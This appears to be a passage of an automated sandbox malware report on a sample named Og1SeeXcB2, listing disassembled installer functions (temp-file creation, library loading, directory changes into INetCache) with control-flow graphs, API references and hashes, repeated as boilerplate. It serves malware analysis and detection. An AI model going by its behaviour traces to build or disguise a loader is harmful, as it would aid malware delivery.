                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                  • String ID: &B
                                                                                                                                                                                                                                  • API String ID: 2531174081-3208460036
                                                                                                                                                                                                                                  • Opcode ID: bea2b5a7135099c68aadf7c6861b5a1d546924ebcd1bbda38a4905401ce86b05
                                                                                                                                                                                                                                  • Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bea2b5a7135099c68aadf7c6861b5a1d546924ebcd1bbda38a4905401ce86b05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8
                                                                                                                                                                                                                                  Function 00406760 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 576 406760-406780 GetSystemDirectoryW 577 406782 576->577 578 406784-406786 576->578 577->578 579 406797-406799 578->579 580 406788-406791 578->580 582 40679a-4067cd wsprintfW LoadLibraryExW 579->582 580->579 581 406793-406795 580->581 581->582
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004067B2
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                  • Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8
                                                                                                                                                                                                                                  Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 583 40324c-403263 584 403265 583->584 585 40326c-403274 583->585 584->585 586 403276 585->586 587 40327b-403280 585->587 586->587 588 403290-40329d call 403431 587->588 589 403282-40328b call 403447 587->589 593 4032a3-4032a7 588->593 594 4033e8 588->594 589->588 595 4033d1-4033d3 593->595 596 4032ad-4032cd GetTickCount call 40692b 593->596 597 4033ea-4033eb 594->597 598 4033d5-4033d8 595->598 599 40341c-403420 595->599 607 403427 596->607 609 4032d3-4032db 596->609 601 40342a-40342e 597->601 602 4033da 598->602 603 4033dd-4033e6 call 403431 598->603 604 403422 599->604 605 4033ed-4033f3 599->605 602->603 603->594 617 403424 603->617 604->607 610 4033f5 605->610 611 4033f8-403406 call 403431 605->611 607->601 613 4032e0-4032ee call 403431 609->613 614 4032dd 609->614 610->611 611->594 619 403408-403414 call 405f83 611->619 613->594 622 4032f4-4032fd 613->622 614->613 617->607 625 403416-403419 619->625 626 4033cd-4033cf 619->626 624 403303-403320 call 40694b 622->624 629 403326-40333d GetTickCount 624->629 630 4033c9-4033cb 624->630 625->599 626->597 631 403388-40338a 629->631 632 40333f-403347 629->632 630->597 635 40338c-403390 631->635 636 4033bd-4033c1 631->636 633 403349-40334d 632->633 634 40334f-403380 MulDiv wsprintfW call 405443 632->634 633->631 633->634 641 403385 634->641 639 403392-403397 call 405f83 635->639 640 4033a5-4033ab 635->640 636->609 637 4033c7 636->637 637->607 644 40339c-40339e 639->644 643 4033b1-4033b5 640->643 641->631 643->624 645 4033bb 643->645 644->626 646 4033a0-4033a3 644->646 645->607 646->643
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                  • String ID: ... %d%%
                                                                                                                                                                                                                                  • API String ID: 551687249-2449383134
                                                                                                                                                                                                                                  • Opcode ID: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
                                                                                                                                                                                                                                  • Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9
                                                                                                                                                                                                                                  Function 00405F00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 647 405f00-405f0c 648 405f0d-405f41 GetTickCount GetTempFileNameW 647->648 649 405f50-405f52 648->649 650 405f43-405f45 648->650 652 405f4a-405f4d 649->652 650->648 651 405f47 650->651 651->652
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F1E
                                                                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,0040348D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9), ref: 00405F39
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                  • API String ID: 1716503409-678247507
                                                                                                                                                                                                                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                  • Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68
                                                                                                                                                                                                                                  Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 736 4015c1-4015d5 call 402d3e call 405d5b 741 401631-401634 736->741 742 4015d7-4015ea call 405cdd 736->742 744 401663-4022ee call 401423 741->744 745 401636-401655 call 401423 call 4063db SetCurrentDirectoryW 741->745 749 401604-401607 call 40598f 742->749 750 4015ec-4015ef 742->750 757 402bc2-402bd1 744->757 758 402925-40292c 744->758 745->757 766 40165b-40165e 745->766 761 40160c-40160e 749->761 750->749 753 4015f1-4015f8 call 4059ac 750->753 753->749 770 4015fa-401602 call 405912 753->770 758->757 763 401610-401615 761->763 764 401627-40162f 761->764 768 401624 763->768 769 401617-401622 GetFileAttributesW 763->769 764->741 764->742 766->757 768->764 769->764 769->768 770->761
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
                                                                                                                                                                                                                                    • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
                                                                                                                                                                                                                                    • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                    • Part of subcall function 00405912: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                  • API String ID: 1892508949-455884830
                                                                                                                                                                                                                                  • Opcode ID: 38de229b96fada6a2a749b4477b4eb55c198c22db0e46b32473b3478d97f3d28
                                                                                                                                                                                                                                  • Instruction ID: 4b740b80641ba3a3eb8a8ec9adfde8f0bc1f07408697dd7e04d4643b588e1c06
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38de229b96fada6a2a749b4477b4eb55c198c22db0e46b32473b3478d97f3d28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1411E231504114EBCF206FA5CD4199F37B0EF24328B28493BE912B12F1D63E49829B6E
                                                                                                                                                                                                                                  Function 00406F2F Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 777 406f2f-406f35 778 406f37-406f39 777->778 779 406f3a-406f58 777->779 778->779 780 407166-40717b 779->780 781 40722b-407238 779->781 783 407195-4071ab 780->783 784 40717d-407193 780->784 782 407262-407266 781->782 786 4072c6-4072d9 782->786 787 407268-407289 782->787 785 4071ae-4071b5 783->785 784->785 789 4071b7-4071bb 785->789 790 4071dc 785->790 788 4071e2-4071e8 786->788 791 4072a2-4072b5 787->791 792 40728b-4072a0 787->792 798 407395 788->798 799 40698d 788->799 793 4071c1-4071d9 789->793 794 40736a-407374 789->794 790->788 795 4072b8-4072bf 791->795 792->795 793->790 797 407380-407393 794->797 800 4072c1 795->800 801 40725f 795->801 803 407398-40739c 797->803 798->803 804 406994-406998 799->804 805 406ad4-406af5 799->805 806 406a39-406a3d 799->806 807 406aa9-406aad 799->807 810 407244-40725c 800->810 811 407376 800->811 801->782 804->797 812 40699e-4069ab 804->812 805->780 808 406a43-406a5c 806->808 809 4072e9-4072f3 806->809 813 406ab3-406ac7 807->813 814 4072f8-407302 807->814 815 406a5f-406a63 808->815 809->797 810->801 811->797 812->798 816 4069b1-4069f7 812->816 817 406aca-406ad2 813->817 814->797 815->806 818 406a65-406a6b 815->818 819 4069f9-4069fd 816->819 820 406a1f-406a21 816->820 817->805 817->807 823 406a95-406aa7 818->823 824 406a6d-406a74 818->824 825 406a08-406a16 GlobalAlloc 819->825 826 4069ff-406a02 GlobalFree 819->826 821 406a23-406a2d 820->821 822 406a2f-406a37 820->822 821->821 821->822 822->815 823->817 827 406a76-406a79 GlobalFree 824->827 828 406a7f-406a8f GlobalAlloc 824->828 825->798 829 406a1c 825->829 826->825 827->828 828->798 828->823 829->820
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                                                                                                                                                                                  • Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                                                  Function 00407130 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                                                                                                                                                                                  • Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45
                                                                                                                                                                                                                                  Function 00406E46 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                                                                                                                                                                                  • Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
